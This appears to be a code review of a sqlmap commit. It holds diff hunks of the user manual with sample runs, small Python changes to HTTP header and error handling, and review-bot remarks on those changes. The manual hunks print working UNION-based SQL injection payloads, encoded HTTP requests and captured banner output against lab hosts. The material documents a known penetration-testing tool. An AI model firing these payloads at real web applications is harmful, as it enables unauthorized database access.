&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td&gt;blLOjN5.0.51a-3ubuntu5.2zniYyA&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;
&lt;/body&gt;&lt;/html&gt;
[hh:mm:25] [INFO] performed 3 queries in 0 seconds
banner: '5.0.51a-3ubuntu5.2'
</verb></tscreen>
<p>
As you can see, the MySQL <tt>version()</tt> function (banner) output is
nested (inband) within the HTTP response page, this makes the inband SQL
injection exploitable.
<sect1>Injection <sect1>Injection
<sect2>String match <sect2>String match
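Review bot: the same two points as on the README.html hunk for section 5.2 apply here, the "TODO" under `--time-test` and the now ambiguous "Refer to the Techniques section" cross-reference; since this `<sect1>`/`<tscreen>` source is what the HTML above mirrors, the fix belongs in this file first.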
@ -2671,149 +2845,6 @@ functionalities of SQL shell.
<sect1>Miscellaneous <sect1>Miscellaneous
<sect2>Test for UNION SELECT query SQL injection
<p>
Option: <tt>--union-test</tt>
<p>
It is possible to test if the target URL is affected by an <bf>inband
SQL injection</bf> vulnerability.
Refer to the <em>Techniques</em> section for details on this SQL injection
technique.
<p>
Example on an <bf>Oracle XE 10.2.0.1</bf> target:
<tscreen><verb>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1&amp;cat=2" \
--union-test -v 1
[...]
back-end DBMS: Oracle
[hh:mm:55] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:55] [INFO] the target url could be affected by an inband sql injection vulnerability
valid union: 'http://192.168.1.121:80/sqlmap/oracle/get_int.php?id=1 UNION ALL SELECT
NULL, NULL, NULL FROM DUAL-- AND 5601=5601&amp;cat=2'
</verb></tscreen>
<p>
Example on a <bf>PostgreSQL 8.2.7</bf> target:
<tscreen><verb>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_str.php?id=1&amp;cat=2" \
--union-test -v 1
[...]
back-end DBMS: PostgreSQL
[hh:mm:05] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:05] [INFO] the target url could be affected by an inband sql injection vulnerability
valid union: 'http://192.168.1.121:80/sqlmap/pgsql/get_str.php?id=1' UNION ALL SELECT
NULL, NULL, NULL-- AND 'QOAtA'='QOAtA&amp;cat=2'
</verb></tscreen>
<p>
As you can see, the target URL parameter <tt>id</tt> might be also
affected by an inband SQL injection.
In case this vulnerability is exploitable it is strongly recommended to
use it.
<sect2>Use the UNION SELECT query SQL injection
<p>
Option: <tt>--union-use</tt>
<p>
Providing the <tt>--union-use</tt> parameter, sqlmap will first test if
the target URL is affected by an <bf>inband SQL injection</bf>
(<tt>--union-test</tt>) vulnerability then, in case it is vulnerable and
exploitable, it will trigger this vulnerability to retrieve the output of
the <tt>SELECT</tt> queries.
<p>
Example on a <bf>Microsoft SQL Server 2000 Service Pack 0</bf> target:
<tscreen><verb>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1&amp;cat=2" -v 1 \
--union-use --banner
[...]
back-end DBMS: Microsoft SQL Server 2000
[hh:mm:42] [INFO] fetching banner
[hh:mm:42] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:42] [INFO] the target url could be affected by an inband sql injection vulnerability
[hh:mm:42] [INFO] confirming inband sql injection on parameter 'id'
[hh:mm:42] [INFO] the target url is affected by an exploitable inband sql injection
vulnerability
[hh:mm:42] [INFO] query: UNION ALL SELECT NULL, (CHAR(110)+CHAR(83)+CHAR(68)+CHAR(80)+
CHAR(84)+CHAR(70))+ISNULL(CAST(@@VERSION AS VARCHAR(8000)), (CHAR(32)))+(CHAR(70)+CHAR(82)+
CHAR(100)+CHAR(106)+CHAR(72)+CHAR(75)), NULL-- AND 5204=5204
[hh:mm:42] [INFO] performed 3 queries in 0 seconds
banner:
---
Microsoft SQL Server 2000 - 8.00.194 (Intel X86)
Aug 6 2000 00:57:48
Copyright (c) 1988-2000 Microsoft Corporation
Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
---
</verb></tscreen>
<p>
As you can see, the vulnerable parameter (<tt>id</tt>) is affected by both
blind SQL injection and exploitable inband SQL injection vulnerabilities.
<p>
Example on a <bf>MySQL 5.0.51</bf> target:
<tscreen><verb>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat=2" -v 5 \
--union-use --banner
[...]
[hh:mm:25] [INFO] the target url is affected by an exploitable inband sql injection
vulnerability
[hh:mm:25] [INFO] query: UNION ALL SELECT NULL, CONCAT(CHAR(98,108,76,79,106,78),
IFNULL(CAST(VERSION() AS CHAR(10000)), CHAR(32)),CHAR(122,110,105,89,121,65)), NULL--
AND 6043=6043
[hh:mm:25] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_int.php?id=1%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%2898
%2C108%2C76%2C79%2C106%2C78%29%2CIFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%2810000%29%29
%2C%20CHAR%2832%29%29%2CCHAR%28122%2C110%2C105%2C89%2C121%2C65%29%29%2C%20NULL--%20AND%2
06043=6043&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:25] [TRAFFIC IN] HTTP response (OK - 200):
Date: Mon, 28 Jul 2008 22:34:25 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.2 with Suhosin-Patch mod_ssl/2.2.8
OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.2
Content-Length: 194
Connection: close
Content-Type: text/html
&lt;html&gt;&lt;body&gt;
&lt;b&gt;SQL results:&lt;/b&gt;
&lt;table border="1"&gt;
&lt;tr&gt;&lt;td&gt;1&lt;/td&gt;&lt;td&gt;luther&lt;/td&gt;&lt;td&gt;blissett&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td&gt;blLOjN5.0.51a-3ubuntu5.2zniYyA&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;
&lt;/body&gt;&lt;/html&gt;
[hh:mm:25] [INFO] performed 3 queries in 0 seconds
banner: '5.0.51a-3ubuntu5.2'
</verb></tscreen>
<p>
As you can see, the MySQL <tt>version()</tt> function (banner) output is
nested (inband) within the HTTP response page, this makes the inband SQL
injection exploitable.
<sect2>Estimated time of arrival <sect2>Estimated time of arrival
<p> <p>


@ -278,6 +278,13 @@ def __setHTTPMethod():
conf.method = "GET" conf.method = "GET"
def __setHTTPStandardHeaders():
conf.httpHeaders.append(("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"))
conf.httpHeaders.append(("Accept-Language", "en-us,en;q=0.5"))
conf.httpHeaders.append(("Accept-Encoding", "gzip,deflate"))
conf.httpHeaders.append(("Accept-Charset", "ISO-8859-15,utf-8;q=0.7,*;q=0.7"))
def __defaultHTTPUserAgent(): def __defaultHTTPUserAgent():
""" """
@return: default sqlmap HTTP User-Agent header @return: default sqlmap HTTP User-Agent header
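Review bot: `__setHTTPStandardHeaders` advertises `Accept-Encoding: gzip,deflate`, which invites the server to return a compressed body; nothing in this commit adds `Content-Encoding` handling on the response side, so `--string` matching, the page comparison the blind technique relies on and the `[TRAFFIC IN]` log would all see gzip bytes from any server that honours the header. Suggest dropping Accept-Encoding from the defaults, or decompressing where the page is read before the headers are sent. Minor: the appends are unconditional, so a second call to `init` would send each of these headers twice; checking `conf.httpHeaders` for an existing name before appending is cheap.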
@ -566,6 +573,7 @@ def init(inputOptions=advancedDict()):
__setHTTPCookies() __setHTTPCookies()
__setHTTPReferer() __setHTTPReferer()
__setHTTPUserAgent() __setHTTPUserAgent()
__setHTTPStandardHeaders()
__setHTTPMethod() __setHTTPMethod()
__setHTTPAuthentication() __setHTTPAuthentication()
__setHTTPProxy() __setHTTPProxy()


@ -24,6 +24,7 @@ Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import httplib
import md5 import md5
import re import re
import socket import socket
@ -182,6 +183,19 @@ class Connect:
warnMsg += " or proxy" warnMsg += " or proxy"
raise sqlmapConnectionException, warnMsg raise sqlmapConnectionException, warnMsg
except httplib.BadStatusLine, _:
warnMsg = "the target url responded with an unknown HTTP "
warnMsg += "status code, try to force the HTTP User-Agent "
warnMsg += "header with option --user-agent or -a"
if conf.googleDork:
warnMsg += ", skipping to next url"
logger.warn(warnMsg)
return None
else:
raise sqlmapConnectionException, warnMsg
parsePage(page) parsePage(page)
responseMsg += "(%s - %d):\n" % (status, code) responseMsg += "(%s - %d):\n" % (status, code)
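Review bot: the `except httplib.BadStatusLine, _:` branch throws the exception away, yet its `.line` attribute holds the raw bytes httplib could not parse as a status line (empty when the server simply closed the connection); binding it to a name and logging `repr(e.line)` at debug level tells the user whether they got an empty reply or a non-HTTP banner, which the fixed hint "try to force the HTTP User-Agent header" cannot. Second, the `conf.googleDork` path returns `None` from here, so every caller of this method must now tolerate a `None` page, and none of them appears in the hunk; please check them before merging (the non-dork path raises, matching the socket error branch just above). Minor: BadStatusLine means a missing or malformed status line, not an "unknown HTTP status code" (an unknown code still parses), so "the target url did not return a valid HTTP response" would be the accurate message.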